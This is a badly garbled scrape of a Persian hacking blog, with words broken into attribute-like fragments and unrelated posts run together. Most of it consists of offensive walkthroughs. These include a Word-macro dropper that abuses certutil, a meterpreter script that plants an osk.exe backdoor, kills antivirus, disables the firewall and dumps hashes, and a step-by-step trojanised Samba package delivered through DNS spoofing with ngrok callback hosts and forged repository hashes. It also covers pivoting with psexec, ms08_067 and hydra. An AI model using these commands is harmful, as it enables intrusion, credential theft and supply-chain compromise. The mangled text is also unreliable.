www.youtube.com=”” watch?v=”WICq_Pj8ZUkاین” منفی=”” چنانچه=”” رهبر=”” سرپرست=”” میشود=”” وی=”” بهجای=”” رهبری=”” رئیس=”” بگیرد=”” ذیل=”” تفاوتهای=”” میکند.=”” تبدیل=”” قطعاً=”” ویژگیهای=”” نمود=”” فرصتهای=”” آتی=”” مطالبی=”” نوشتتوجه:=”” دادهشده=”” همان=”” اندک=”” متعهد=”” هستند،=”” نیز=”” نمیکند=”” است#آفت=”” ۲:=”” همکاران=”” رقیبانی=”” درستی=”” حرفهای=”” تلاشی=”” نمیتوانند=”” دیگران=”” باشند.در=”” شرکتها،=”” نهادهای=”” «مسابقه=”” خرسواری»=”” شفاف=”” مینماید,البته=”” گردد=”” کتاب=”” :«جامعه=”” شناسی=”” خودمانی»=”” حسن=”” نراقی=”” مفصل=”” پرداخته=”” خلاصه=”” وبنوشتم=”” ام(لینک).https:=”” ketabnak.com=”” merger.php?dlid=”9413میدانید” هیچگاه=”” خرسواری=”” »برگزار=”” نمیشود؟!=”” جانورشناسان،=”” اسبها=”” میدان=”” مسابقه=”” مستقیم=”” حرکت=”” نهتنها=”” مانع=”” تاختن=”” سایر=”” نمیشوند،=”” هرگاه=”” سوارکار=”” خودشان=”” بیفتد=”” بتوانند=”” سقوط=”” لگد=”” نمیکنند؛=”” خرها=”” میگیرند،=”” استارت،=”” اصلاً=”” توجهی=”” بهصورت=”” نداشته=”” خر=”” رقیب=”” جناح=”” چپ=”” راستش=”” دارد،=”” تمرکزش،=”” ممانعت=”” است!=”” هدفشان=”” رسیدن=”” شوند!=”” نرسند.=”” معناست=”” ناتوان=”” میدانند=”” نمیرسند،=”” سنگاندازی=”” مشکلات=”” چوب=”” لای=”” چرخ=”” گذاشتن،=”” بهانه=”” مختلف،=”” اهدافشان=”” میشوند=”” اصطلاح=”” میگویند:=”” «فلانی(reza=”” %98=”” lammer)،=”” انداخته=”” است».-#real=”” cyber=”” senariosدر=”” صفر=”” صد=”” #apts=”” چالشی=”” میخواهیم=”” طبق=”” تحلیلی=”” 38=”” fireeye=”” ساده.نکته=”” apts=”” طی=”” social=”” engineering=”” spear=”” email=”” phishing=”” منظور=”” میدانی=”” میاره=”” ایمیل=”” policy=”” نیروهای=”” عهده=”” آماری=”” رصدهای=”” اغلب=”” سناریویی=”” میبینند=”” ذهنیتی=”” مثالی=”” پلیس=”” کشوری=”” دهی=”” گزارش=”” رخداد=”” هکری=”” میدهد=”” مضمون=”” microsoft=”” word=”” documents=”” attach=”” فرستاده=”” غایب=”” جلوتر=”” میپردازم=”” بله=”” بدادم=”” برس=”” نوعی=”” خسارت=”” :))اکی=”” آنجای=”” پایه=”” بنا=”” زدید=”” macro=”” document=”” decetions=”” avs=”” قبلش=”” کجا=”” فهمیدیم=”” یکبار=”” تماس=”” fake=”” رسانی=”” باهاشون=”” ویندوزی=”” بنام=”” ویندوز,https:=”” certutilاین=”” certificate=”” command-line=”” encode=”” میخونه=”” منه=”” مهاجم=”” enable=”” vba=”” رفتیم=”” کنیدsub=”” objrun(commandmoveto=”” string,=”” copyto01=”” copyto02=”” cermovecomand=”” allusersprofile=”” string) dim=”” certutilcomand=”” stringcermovecomand=”cmd.exe /c copy %windir%\\system32\\certutil.exe %temp%tcm.tmp” objws=”CreateObject(“Wscript.Shell”)objws.Run” commandmoveto,=”” trueobjws.run=”” cermovecomand,=”” “padre1.txt=”” copyto01,=”” “padre2.txt=”” copyto02,=”” “padre3.txt=”” copyto03,=”” “esentutl.exe=”” d=”” “gup.exe”=”” o”,=”” “libcurl.dll”=”” “gup”=”” “.e”=”” “xe”,=”” falseobjws.run=”” “cmd.exe=”” f=”” q=”” “*.txt”,=”” falseend=”” sub (~0)در=”” شده,در=”” %temp%=”” tcm.tmp=”” certtutil.exe=”” pem=”” padre1-padre2-padre3=”” ۹=”” دیکد=”” شدc:\windows\system32\cmd.exe”=”” c:\programdata\padre1.txt=”” c:\programdata\\gup.txt=”” c:\windows\system32\cmd.exe”=”” c:\programdata\padre2.txt=”” c:\programdata\\libcurl.txt=”” c:\programdata\padre3.txt=”” c:\programdata\\3f2e3ab9=”” padre=”” شد,اما=”” gup.txt=”” libcurl.txt=”” generic=”” updater=”” notepad++=”” signature=”” libcurl.dll=”” لودر=”” مخرب=”” همچین=”” دیگری=”” extensible=”” storage=”” engine=”” esentutil.exe=”” support.microsoft.com=”” en-ae=”” help=”” 930832=”” support-for-the-esentutl-exe-tool-on-a-windows-server-2003-certificatiخب=”” gup.exe=”” 3f2e3ab9=”” decrypts=”” دیباگ=”” ntdll_ntsetinformationthread=”” مجهز=”” هستتمام=”” out=”” شلکدی=”” نهایتا=”” min=”” عملیاتی=”” خوشتون=”” امده=”” وقتشه=”” هوشیار=”” بشوند:)https:=”” www.bleepingcomputer.com=”” news=”” certutilexe-could-allow-attackers-to-download-malware-while-bypassing-av=”” #blackhat=”” #roadmapنقشه=”” جایگاه=”” دارا=”” بود,همچنین=”” پیشگیری=”” کارآمدی=”” بود,این=”” نقشه=”” تدوین=”” است.آشنایی=”” ها.1.command-lines=”” *2.lpic=”” *آشنایی=”” مفاهیم=”” هک,شبکه=”” هکر.3.network=”” plus=”” *4.ceh=”” chfi=”” وب.5.html5=”” javascript=”” *6.php=”” asp=”” sql=”” *7.basic=”” *8.advanced=”” *طریقه=”” اجتماعی.9.osint=”” techniques=”” methodology=”” نویسی,ابزار=”” c&c.10.shell=”” scripting=”” *11.penetration=”” *12.basic=”” infrastructure=”” *13.metasploit=”” mastery=”” پایتون.14.python=”” hacker=”” bootcamp:=”” zero=”” hero=”” *زبان=”” ها.15.actionscript=”” persistence=”” غیره.16.pentesting=”” enterprise=”” *تکنیک=”” روشهای=”” pivoting.17.advanced=”” افزاری.18.social=”” physical=”” فضاء.19.advanced=”” wireless=”” سرشماری=”” ها.20.adaptive=”” avs.21.adversary=”” tactics:=”” گیرنده=”” فرستنده=”” رادیویی.22.software=”” defined=”” radio=”” اشیاء=”” استفاده.23.practical=”” iot=”” اسمبلی=”” زیرین=”” میباشد.24.assembly=”” فیزیکی=”” الکترونیکی.25.physical=”” electronic=”” control=”” کنترولر=”” scada=”” iot.26.assessing=”” exploiting=”” معکوس=”” بدافزار=”” نیاز.27.malware=”” analysis=”” crash=”” course=”” مختلف.28.practical=”” vulnerability=”” discovery=”” *آموزش=”” پردازنده=”” مبهم=”” سازی.29.the=”” shellcode=”” lab=”” *اکسپلویت=”” نفوذ.30.tactical=”” exploitation:=”” attacking=”” unix=”” اکسپلوت=”” ابری=”” azure.31.aws=”” azure=”” مموری.32.in-depth=”” attackers=”” ids,ips,siems.33.dark=”” side=”” ops-custom=”” افزاری.34.hacking=”” firmware=”” hardware=”” لازمه=”” قبیل=”” windbg.35.windows=”” primer=”” آن.36.windows=”” rootkit=”” net.=”” detections.37.dark=”” ops=”” 2-adversary=”” simulation=”” arm=”” آن.38.arm=”” laboratory:=”” intro=”” ios=”” android.39.offensive=”” mobile=”” reversing=”” دفاعی.40.the=”” automation=”” *#help=”” u:warning:گزینه=”” ستاره=”” واجب=”” هستند.:anger:برای=”” ذکر=”” کافیست=”” blackhat=”” گوگل=”” دید,:warning:=”” نکته:=”” موارد=”” قبلی=”” زیرمجموع=”” ها,در=”” شد,:anger:برای=”” یادگیری=”” میتوانید=”” اصولی=”” هزینه=”” ناچیز=”” آغاز=”” ربات=”” مراجعه=”” عضویت=”” ۱۰۰=”” تومان=”” میباشد.#post=”” windowsدر=”” حرکاتی=”” آوریم.=”” ت=”” کارشناسان=”” امنیتی=”” اذعان=”” دسترس=”” عموم=”” قربانیان=”” برخوردار=”” مسلط=”” بتونید=”” section=”” encryption=”” pack=”” رایجی=”” موجوده=”” ریشه=”” بپردازیم=”” دستوراتی=”” prompet=”” مشکوک=”” hashdump=”” sam=”” میکنند,خب=”” حل=”” موجود=”” رفع=”” باشه,برای=”” خوراندن=”” 406=”” میگیریم,open=”” terminal1.touch=”” auto.rc=”” addedrun=”” getgui=”” 00980098=”” execute=”” -h=”” cmd.exe=”” net=”” grant:everyone,full”=”” reg=”” createkey=”” hklm\\software\\microsoft\\windows\=”” nt\\currentversion\\image\=”” file\=”” execution\=”” options\\osk.exe=”” debugger=”” reg_sz=”” “c:\windows\system32\cmd.exe”=”” pkill=”” msseces.exe=”” bypassuac=”” technique=”PSH” priv_migrate=”” getprivs=”” getsystem=”” local_exploit_suggester=”” gather=”” checkvm=”” killav=”” netsh=”” opmode=”” mode=”disable”” advfirewall=”” allprofiles=”” off”=”” product=”” where=”” uninstall=”” nointeractive’=”” show=”” profiles”=”” profile=”” background=”” enter2.msfconsole=”” auto.rc;set=”” x86=”” call4_dword_xor;set=”” درایو=”” osk.exe=”” فشردن=”” virtual=”” بستن=”” uac=”” nt=”” thread=”” vm=”” مجازی=”” antivirus=”” disable=”” kaspersky=”” دیفندر=”” دیدن=”” برمیگرده=”” meterpreter.–#hta to=”” whitelistingمیخوام=”” سرتون=”” بندازم=”” گیجی=”” عشق=”” بطوری=”” کنیم,موضوع=”” پست… #integer=”” overflowدر=”” همانند=”” میباشند=”” میباشد.برای=”” میبایست=”” ++c=”” datatype=”” چارت=”” کنیدdatatypes(default=”” signed)int=”” #=”” byte-16=”” 32=”” bit=”” (-32767=”” 32767)=”” (-2^32=”” 2^32)=”” short=”” long=”” float=”” (a=”” 10’7)=”” double=”” 64=”” 10’15)=”” bool=”” (0=”” 1)=”” datatypes(undefault=”” unsigned)unsigned=”” (65535)=”” (2^64)=”” 10’14)=”” 10’30)=”” byte=”” اشغال=”” نگه=”” اعداد=”” صحیح=”” اکثر=”” بازه=”” متغیرها=”” 32767=”” مثبت=”” بتوان=”” foat-double-char=”” foat=”” اعشاری=”” هفت=”” رقم=”” اعشار=”” پانزده=”” متنی=”” #نکته=”” حائز=”” اهمیت=”” signed=”” میشوند=”” منهی=”” پوشش=”” میده,اما=”” عبارت=”” ببریم=”” نمیکنه=”” 65535=”” false=”” خودمونه=”” شده#include=”” “stdafx.h”=”” <iostream>=”” using=”” namespace=”” std;=”” 1;=”” cout=”” <<=”” endl;=”” متغیر=”” !!!=”” میکرده=”” خرتناق=”” ,حالا=”” تفاسیر=”” اتفاقی=”” افته؟!=”” بلی=”” سرریز=”” اومدم=”” قاعدتا=”” بعلاوه=”” 65536=”” درسته=”” کمال=”” تعجب=”” برمیگردونه!!!=”” integer=”” overflow=”” اندروید=”” سابقه=”” exploit-db=”” مخصوصا=”” مفسرهای=”” فرمتاش=”” mp4=”” audio=”” گرا=”” ندم=”” کد:0=”” any=”” fa.wikipedia.org=”” سرریز_عدد_صحیحhttps:=”” www.exploit-db.com=”” 40436 اما=”” کدی=”” ناشناس=”” ؟؟=”” بشناسیم=”” ابعاد=”” رو,خب=”” عملگرهای=”” پیداس=”” معنیه=”” عملگرها=”” محاسباتی=”” بدن=”” دویی=”” محاسبه=”” binary=”” [00000111]=”” [00000101]=”” b;=”” 00000111=”” 00000101=”00000101″ [5]=”” d;=”” [7]=”” g=”7;” h=”5;” j=”g” ^=”” h;=”” [2]=”” محاسبات=”” عملگر=”” (&)=”” میشود,اگر=”” عملکردهای=”” معادله=”” دوییش=”” ?!=”” معادلات=”” قانون=”” اجزای=”” نظیر=”” میکنیم,با=”” زیرجمع=”” هستش,بنابر=”” مقدارهای=”” ده=”” میباشد,اما=”” یای=”” بیتیست=”” ورتیکال=”” (|)=”” عمگر=”” میشه,یک=”” منطق=”” معادلیه=”” 1برابر=”” مساوی=”” بود.و=”” xor=”” انحصاری=”” علامت=”” کَرت=”” (^)=”” قوانینی=”” 00000010=”” آمد,خب=”” فهمیدن=”” پتانسیل=”” کاراکترهای=”” ()createremotethread=”” tid=”” کانکشن=”” نکردن=”” مصنوعی=”” میداره:)=”” نیست…خروجی=”” کد5=”” bitwise_operations_in_c-#recursive=”” functionنکته=”” کرش=”” نمی=”” شوند.-مفهوم=”” recursive=”” بیانگر=”” گنجانده=”” است,برای=”” میزنم:open=”” recursive.cpp=”” a(int=”” _x)=”” _x=”” _a(_x=”” 1);=”” _a(1);=”” prompt=”” ()a=”” درش=”” کل=”” واحد=”” میشه,باز=”” ()main=”” اختصاص=”” انتظار=”” بدلیل=”” ی=”” نا=”” متناهی=”” کاسته=”” کنه,خب=”” 240=”” oriented=”” مدت=”” بشه,تکنیک=”” انداختن=”” بدیم؟؟؟=”” ابتدا=”” مبتنی=”” ida=”” pro=”” پرشی=”” .text=”” assembly=”” hexadecimal=”” rce=”” منتظر=”” بشه,توضیحات=”” تئوری=”” تولید=”” کرد2.g++=”” 3.objdump=”” contents=”” .text:=”” 1080=”” 31ed4989=”” d15e4889=”” e24883e4=”” f050544c=”” 1.i..^h..h…ptl=”” 1090=”” 8d05ea01=”” 0000488d=”” 0d830100=”” 00488d3d=”” ……h……h.=”10a0″ 02010000=”” ff15362f=”” 0000f40f=”” 1f440000=”” ……6=”” …..d..=”” 10b0=”” 488d3d91=”” 2f000048=”” 8d058a2f=”” 00004839=”” h.=”./..H…/..H9″ 10c0=”” f8741548=”” 8b050e2f=”” 00004885=”” c07409ff=”” .t.h…=”” ..h..t..=”” 10d0=”” e00f1f80=”” 00000000=”” c30f1f80=”” …………….=”” شو=”” objdump=”” نمیزارم,خب=”” hex=”” machine=”” درمیاریم=”” صورت4.nano=”” grep.txt=”” added31ed4989d15e4889e24883e4f050544c8d05ea010000488d0d83010000488d3d02010000ff15362f0000f40f1f440000488d3d918d355a2f00004829=”” ………..=”” enter5.sed=”” ‘s=”” \(..\)=”” \\x\1=”” g’=”” cat=”” \x31\xed\x49\x89\xd1\x5e\x48\x89\xe2\x48\x83\xe4\xf0\x50\x54\x4c\x8d\x05\xea\x01\x00\x00\x48\x8d\x0d\x83\x01\x00\x00\x48\x8d\x3d\x02\x01\x00\x00\xff\x15\x36\x2f\x00\x00\xf4\x0f\x1f\x44\x00\x00\x48\x8d\x3d\x91\x8d\x35\x5a\x2f\x00\x00\x48\x29=”” آمادس=”” توابع_بازگشتی#apt=”” mitm=”” package=”” (linux=”” attack)در=”” مدرن=”” تری=”” حوضه=”” مرد=”” میانی=”” طولانی=”” مبحث=”” میشه. خب=”” کمي=”” توضيح=”” ميدم=”” اين=”” سناريو=”” فضاهايي=”” باهاش=”” درگير=”” خواهيم=”” شد,سناريو=”” روي=”” سيستم=”” هاي=”” لينوکسي=”” اينه=”” براي=”” قرباني=”” يک=”” آپديت=”” جعلي=”” کنيم=”” مکانيزم=”” آپگريد=”” اتوماتيک=”” پايلود=”” غالب=”” فايل=”” deb=”” پکيج=”” نهايتا=”” دسترسي=”” ميشود,اما=”” اي=”” ميبايست=”” يا=”” tool=”” بشناسيم=”” بدونيم=”” جديد=”” ميشه=”” ميده=”” ميکنه=”” رساني=”” پروتکلي=”” بررسي=”” تصديق=”” بود,خب=”” زماني=”” ميخوايد=”” ليست=”” بگيره=”” واقع=”” webserver=”” داراي=”” امضاي=”” gpg=”” پيدا=”” مجوز=”” فايلي=”” meta-data=”” مطمئن=”” تعريف=”” دارهخب=”” تفاسير=”” ميتونه=”” بگيره؟=”” اينطور=”” بدليل=”” اختيار=”” release.gpg=”” inrelease=”” packages=”” ميتونيم=”” هويت=”” جعل=”” قالبا=”” spoof=”” گفته=”” محلي=”” پياده=”” سازي=”” بديم=”” خواست=”” قرباني,اما=”” روشي=”” wan=”” vpn=”” tunnling=”” شدني=”” نياز=”” داريم=”” آسيب=”” پذيري=”” سرويس=”” بخوره=”” hosts=”” modify=”” نفع=”” هکراکي=”” عملياتي=”” lan=”” ميکنيم=”” دومي=”” ميپردازيم=”” ديگه=”” کالي=”” لينوکس=”” طرح=”” ريزي=”” بتونن=”” بلا=”” بيارن=”” ,مرحله=”” بايد=”” برخي=”” ضمن=”” يعني=”” کالي1=”” کالي2=”” ميکنمopen=”” -y;apt-get=”” tor;gem=”” bettercap;service=”” start;service=”” start;noip2=”” اينجا=”” ابزارهارو=”” کرديم2.proxychains=”” 837e11a7.ngrok.io=”” ->=”” localhost:80copy=”” (ngrok-url)و=”” ميگيريم=”” طريقه=”” نصبش=”” 156=”” نوت=”” پد=”” ذخيره=”” کنيدopen=”” tab3.proxychains=”” |dns-response|=”” ftp.free.fr=”” 212.27.60.270%=”” [connecting=”” (212.27.60.27)]<><>-okget:1=”” pub=”” kali-rolling=”” [30.5=”” kb]get:2=”” amd64=”” [17.0=”” mb]در=”” proxychains=”” آي=”” پي=”” اسمه=”” zone=”” پيشنهاد=”” بياريم,اکي=”” ميريم=”” ميکنيمvisit=”” (inrelease)=”” dists=”” inreleasevisit=”” (main=”” packages)=”” binary-amd64=”” packages4.wget=”” inrelease;wget=”” release.gpg;wget=”” کانفيگ=”” spoofing=”” اسکريپت=”” عمليات=”” معرفي=”” بدونه=”” ميخواد=”” کنه-#ngrok bypass=”” میده… 5.nano=”” dns.conf=”” added=”” (apt=”” dns)#=”” lines=”” will=”” be=”” ignored.=”” redirect=”” *.google.com=”” attacker=”” .*google\.com=”” .*kali\.download=”” .*ftp.free\.fr=”” .*http.kali\.org=”” *.microsoft.com=”” 10.10.10.10=”” .*microsoft\.com=”” enter6.bettercap=”” (taeget)=”” –dns=”” tabباز=”” کاري=”” نداريم=”” مناسب=”” bind=”” بارگزاري=”” کنيم7.dpkg=”” -l=”” samba=”” ii=”” 2:4.9.4+dfsg-2=”” smb=”” cifs=”” file,=”” print,=”” login=”” unixsearch=”” (name=”” version)=”” find=”” s8.wget=”” samba_4.9.4%2bdfsg-2_amd64.deb;mkdir=”” dpkg-deb=”” samba_4.9.4+dfsg-2_amd64.deb=”” rm=”” 64bit9.msfvenom=”” xor_dynamic=”” “\x00″=”” elf=”” ######.elf32bit9.msfvenom=”” call4_dword_xor=”” ######.elf=”” باشيد=”” حسب=”” معماري=”” پردازشي=”” nmap=”” شناسايي=”” ميسازيم=”” اکي=”” اسکريپتي=”” تزريق=”” بسازيم=”” دانلودش=”” کردم10.nano=”” sbin=”” samba_update=”” (ngrok-url)#!=”” 74c8be81.ngrok.io=”” 700=”” enterخب=”” پايلودي=”” دايرکتوري=”” پاک=”” مياره11.chmod=”” samba_update;sed=”” dpkg-maintscript-helper=”” rm_conffile=”” etc\=”” init\=”” smbd.conf=”” \crontab=”” cat;=”” “*=”” “;=”” crontab=”” -‘=”” postinst=”” 12.head=”” 5;sed=”” ‘s#version:=”” 2:4.9.4+dfsg-2#version:=”” 2:4.9.4+dfsg-3#g’=”” control;dpkg-deb=”” samba_4.9.4+dfsg-3_amd64.deb=”” package:=”” sambaversion:=”” 2:4.9.4+dfsg-2architecture:=”” amd64maintainer:=”” maintainers=”” <pkg-samba-maint@lists.alioth.debian.org>installed-size:=”” 15960copy=”” (version)حالا=”” ميايم=”” بياره=”” 11=”” decompile=”” کنیم,حالا=”” اطلاعاتي=”” samaba=”” metadata=”” ويرايش=”” قرياني=”” مطلع=”” موجوده,البته=”” اینو=”” 2:4.9.4+dfsg-3=”” فیک=”” درج=”” تحریک=”” بروزرسانی=”” شود13.apt-cache=”” 30=”” “2:4.9.4+dfsg-2″=”” sha256;apt-cache=”” sha1;apt-cache=”” md5sum;apt-cache=”” filename:=”” sha256:=”” 4c1c8ef271b2de10abe7549111d73f259f06cc0dd791307d208647b4699a4127sha1:=”” 8bb74018fa5d65bc54cd32c4d4638082f39bf96amd5sum:=”” 54a2a8c7dfd60be3a1ef3731b9a0795ffilename:=”” samba_4.9.4+dfsg-2_amd64.debcopy=”” (sha1)در=”” بيرون=”” ميکشيم=”” recompile=”” تغيير=”” اصلي=”” “(version)”=”” ورژني=”” کشيديم=”” بزاريم=”” 14.cat=”” lists=”” http.kali.org_kali_dists_kali-rolling_main_binary-amd64_packages=”” “8bb74018fa5d65bc54cd32c4d4638082f39bf96a”=”” packages;echo=”” **original=”” deb**;cat=”” version:;cat=”” size:;cat=”” sha256:;cat=”” sha1:;cat=”” md5sum:;=”” original=”” debversion:=”” 2:4.9.4+dfsg-2installed-size:=”” 15960size:=”” 1078604sha256:=”” 54a2a8c7dfd60be3a1ef3731b9a0795fحالا=”” sha1=”” آوردیم=”” 15.echo=”” **torjan=”” deb**;echo=”” %sha1%;sha1sum=”” samba_4.9.4+dfsg-3_amd64.deb;echo=”” %sha256%;sha256sum=”” %md5%;md5sum=”” %size%;ls=”” -la=”” torjan=”” deb%sha1%84156e3c5e393c1269d3e9b840127af146603312=”” samba_4.9.4+dfsg-3_amd64.deb%sha256%70068b2d1195c9870d47aa0a3d16b1c2356d0a524ad375f9dc2fa4601e1fba89=”” samba_4.9.4+dfsg-3_amd64.deb%md5%fc778c1fc5385e31dd908ead3f885215=”” samba_4.9.4+dfsg-3_amd64.deb%size%-rw-r–r–=”” 1079436=”” jan=”” 23:55=”” samba_4.9.4+dfsg-3_amd64.debcopy=”” (sha1-sha256-md5-size)خب=”” اثر=”” وبسرورهای=”” installer=”” اصلی,=”” جدیده=”” حتمی=”” ماهیت=”” داداشم=”” جیگر:))=”” درضمن=”” هشدار=”” بدهاما=”” کشیدم=”” واضح=”” size,md5,sha1,sha256=”” sed=”” صورته=”” old=”” filename=”” میشه16.sed=”” version:=”” packages;sed=”” 4c1c8ef271b2de10abe7549111d73f259f06cc0dd791307d208647b4699a4127=”” 7a14cfa2a7e86eb70a6edc9b47b8ca82c959106807ecd6bd7ff417777467d2ec=”” sha1:=”” 8bb74018fa5d65bc54cd32c4d4638082f39bf96a=”” eb2d9ef0d9470a3b788fdccfee2ca100a0d058e8=”” md5sum:=”” 54a2a8c7dfd60be3a1ef3731b9a0795f=”” 9dc425a606bff33660f4a44377300810=”” size:=”” 1078604=”” 1079368=”” سایز=”” میدیم,حالا=”” package.gz=”” بسازیم=”” 17.gzip=”” packages.gz=”” بیاریم:) 18.echo=”” pakages**;cat=”” pakages6133b46b0366171c54067dd9f90cdda6=”” 65572968=”” packagese35a44c98b4de5e20ef8218ef7877c86=”” 17012079=”” packages.gzbaa080a6a93df4d166624fb8e3b88c272b51ae01=”” packages7f66a18da6deab76e6fc46668c7eb5869a1376b6=”” packages.gza36ce2630f62147e2890bedd5db9742da449089eab4b19ef147643b42f97915b=”” packages059e7c9876e12239bb0e4ed4935039fe2d43e590e565ee3eaf48644cdf91a77c=”” packages.gzخب=”” inrealase=”” مطابق=”” میکشیم19.echo=”” **trojan=”” pakages**;md5sum=”” packages*;=”” sha1sum=”” sha256sum=”” packages*;ls=”” packages*=”” pakages7b93d917cbd06f9edd65a3c8e4cf0b9c=”” packages07c73c77dd7a352b7b5daf146b1fcfea=”” packages.gz0b024f35fd88e08f6f0f96ce1353ce1dbdc09b68=”” packagescf2b36c6870858a8213bbc64152d1b7fe5c09a33=”” packages.gzd0124eb92cb4e395b31bcd751389ac8de017cfb25c8acdacec1aa0bee06ebff0=”” packages812b00138fd0b3fc9e679acfe436ec791b93046ff04ad36007b43a201adc4eba=”” packages.gz-rw-r–r–=”” 2447=”” 21:14=”” packages-rw-r–r–=”” 1309=”” 21:26=”” کشیدیم=”” کنیمmd520.sed=”” ‘s#6133b46b0366171c54067dd9f90cdda6=”” packages#7b93d917cbd06f9edd65a3c8e4cf0b9c=”” packages#g’=”” inrelease;sed=”” ‘s#e35a44c98b4de5e20ef8218ef7877c86=”” packages.gz#07c73c77dd7a352b7b5daf146b1fcfea=”” packages.gz#g’=”” sha121.sed=”” ‘s#baa080a6a93df4d166624fb8e3b88c272b51ae01=”” packages#0b024f35fd88e08f6f0f96ce1353ce1dbdc09b68=”” ‘s#7f66a18da6deab76e6fc46668c7eb5869a1376b6=”” packages.gz#cf2b36c6870858a8213bbc64152d1b7fe5c09a33=”” sha25622.sed=”” ‘s#a36ce2630f62147e2890bedd5db9742da449089eab4b19ef147643b42f97915b=”” packages#d0124eb92cb4e395b31bcd751389ac8de017cfb25c8acdacec1aa0bee06ebff0=”” ‘s#059e7c9876e12239bb0e4ed4935039fe2d43e590e565ee3eaf48644cdf91a77c=”” packages.gz#812b00138fd0b3fc9e679acfe436ec791b93046ff04ad36007b43a201adc4eba=”” نه23.echo=”” **modifying=”” modifying=”” برگردیم=”” samba.deb=”” کنیم 24.mkdir=”” pub;chmod=”” pub;mkdir=”” kali;chmod=”” kali;mkdir=”” dists;chmod=”” dists;mkdir=”” kali-rolling;chmod=”” kali-rolling;mkdir=”” main;chmod=”” main;mkdir=”” binary-amd64;chmod=”” binary-amd64;mkdir=”” pool;chmod=”” pool;mkdir=”” s;chmod=”” s;mkdir=”” samba;chmod=”” همگی=”” هستند25.ls=”” samba_4.9.4+dfsg-3_amd64.debاکی=”” روتین=”” کردش=”” شد26.mv=”” ;mv=”” کارها=”” recovery=”” console=”” بنویسم=”” کارهایی=”” مخازن=”” محلی=”” جوابگو=”” اطاعات=”” مفیدی=”” بیاریمwan=”” spoofing27.ping=”” ping=”” (52.14.61.47)=”” 56(84)=”” bytes=”” data.copy=”” (ip-ngrok)28.nano=”” general=”” remmina_creds=”” wlan_geolocate=”” ssh_creds=”” filezilla_client_cred=”” sshkey_persistence=”” busybox=”” smb_share_root=”” passwords=”” cookies=”” enterو=”” لیستینگ=”” metasploit29.msfconsole=”” 4141;set=”” auto.rc;exploit=”” blog.packagecloud.io=”” eng=”” 2018=”” 02=”” 21=”” attacks-against-secure-apt-repositories=”” 2014=”” 28=”” howto-gpg-sign-verify-deb-packages-apt-repositories=”” 2015=”” inspect-extract-contents-debian-packages=”” askubuntu.com=”” questions=”” 253728=”” how-to-safely-download-and-gpg-verify-a-debian-source-packagehttps:=”” secureapt#how_to_manually_check_for_package.27s_integrityhttps:=”” secureapt#signed_release_fileshttps:=”” www.offensive-security.com=”” metasploit-unleashed=”” binary-linux-trojan=”” www.debian.org=”” doc=”” manuals=”” debian-faq=”” ch-pkg_basics.en.html#pivoting=”” networkیکی=”” محبوب=”” تکنیکی=”” pivot=”” معنای=”” کامپیوتری=”” کامپیوتر=”” کامپیوترها=”” پتانسیلش=”” باشه…-شاید=”” سوال=”” کرد؟=”” هستش,اسم=”” pivoting=”” کنید,اما=”” ؟؟؟=”” بشیم,اولین=”” 1.1.1.2=”” 1.1.1.3=”” 1.1.1.4=”” تعاریف=”” routing=”” بکنیم=”” باشیم,با=”” authentication=”” authen=”” ممکنه=”” بازم=”” امیدی=”” کلا=”” pentest=”” بدنبال=”” راهی=”” تکنیکopen=”” instagram.fdoh5-1.fna.fbcdn.net=”” vp=”” 5bc514123eae6757f2d7e151e342fcfc=”” 5cff4e6e=”” t51.2885-15=”” e35=”” 49351811_242625999982906_5514895558731009107_n.jpg?_nc_ht=”instagram.fdoh5-1.fna.fbcdn.net” ######.jpg=”” 2.sed=”” socks4=”” 127.0.0.1=”” 9050=”” #socks4=”” proxychains.conf;echo=”” “socks4=”” (wan)=”” 1080″=”” >>=”” proxychains.conf=”” 3.nano=”” getuid=”” autoroute=”” subnet=”10.10.10.0/24″ auxiliary=”” socks4a=”” enum_computers=”” tcpnetstat=”” smart_hashdump=”” scanner=”” portscan=”” tcp=”” threads=”50″ rhosts=”10.10.10.0/24″ proxies=”SOCKS4:(WAN):1080″ set_wallpaper=”” wallpaper_file=”######.jpg” enter4.msfconsole=”” ms08_067_netapi;set=”” rhost=”” (target);set=”” دیفیس=”” پروکسی=”” رانژه=”” socks=”” مستقیمی=”” rc=”” امدم=”” عاملش=”” رنج=”” 10.10.10.0=”” 24 خب=”” متونم=”” بگیرم=”” نمیتونستم=”” انجاس=”” گرفتن,اما=”” میکشم=”” مثللا=”” بگیرم:)5.msfconsole=”” psexec;set=”” bind_tcp;set=”” smbuser=”” administrator;set=”” smbpass=”” (hash);set=”” 6.proxychains=”” –osscan-guess=”” -sv=”” -st=”” -sc=”” -pn=”” (target)7.run=”” ssh=”” ssh_enumusers=”” user_file=”/usr/share/metasploit-framework/data/wordlists/default_users_for_services_unhash.txt” (user)open=”” tab8.proxychains=”” hydra=”” (target)=”” 22=”” (user)=”” wordlists=”” default_pass_for_services_unhash.txt=”” 9.proxychains=”” (user)@(target)(pass)back=”” tab10.portfwd=”” 8080=”” (target)open=”” tab11.nikto=”” -useproxy=”” (wan):8080=”” browser=”” (wan):8080در=”” گفنیم=”” پذیریی=”” سیع=”” بکشیم=”” ندارم=”” سومی=”” localhost=”” اصل=”” منوال=”” میتونم=”” اسکنش=”” 11و=”” route=”” میسازند=”” بندازید=”” ا=”” bridge=”” بگیرند=”” dhcp=”” دومی=”” tunnel=”” proxy=”” میدونند=”” برقراره=”” بگونه=”” tunneling=”” محقق=”” میتوند=”” اقدام=”” پین=”” دادم….avihttps:=”” reading-room=”” whitepapers=”” paper=”” 33909https:=”” pentest.blog=”” explore-hidden-networks-with-double-pivoting=”” -#operator=”” overloading=”” (obfuscation)در=”” سربار=”” گزاری=”” سربارگزاری=”” سازی… استفاده=”” جنس=”” کلاسی=”” ()######=”” private=”” هستش,همچنین=”” سازنده=”” کردیم,علاوه=”” بخواد=”” بسازه,حالا=”” (-)=”” برخلاف=”” default=”” تفریق=”” operator=”” ماموریتش=”” میشود=”” اونچه=”” دیدنش=”” استنباط=”” رفتار=”” heuristic=”” موتور=”” بخورن؟=”” اذیتشون=”” کنیم–=”” decryption=”” loop=”” detected–=”” reads=”” computer=”” name–=”” cryptographic=”” guid–=”” contacts=”” random=”” domain=”” names–=”” installation=”” date–=”” drops=”” executable=”” files–=”” found=”” potential=”” memory–=”” modifies=”” settings–=”” installs=”” hooks=”” patches=”” running=”” process–=”” injects=”” into=”” explorer–=”” queries=”” information–=”” sets=”” suppress=”” box–=”” unusual=”” entrophy–=”” possibly=”” checks=”” presence=”” engine–=”” monitors=”” specific=”” registry=”” changes–=”” contains=”” ability=”” elevate=”” privileges–=”” software=”” video=”” bios=”” version–=”” endpoint=”” within=”” an=”” uncommon=”” section–=”” 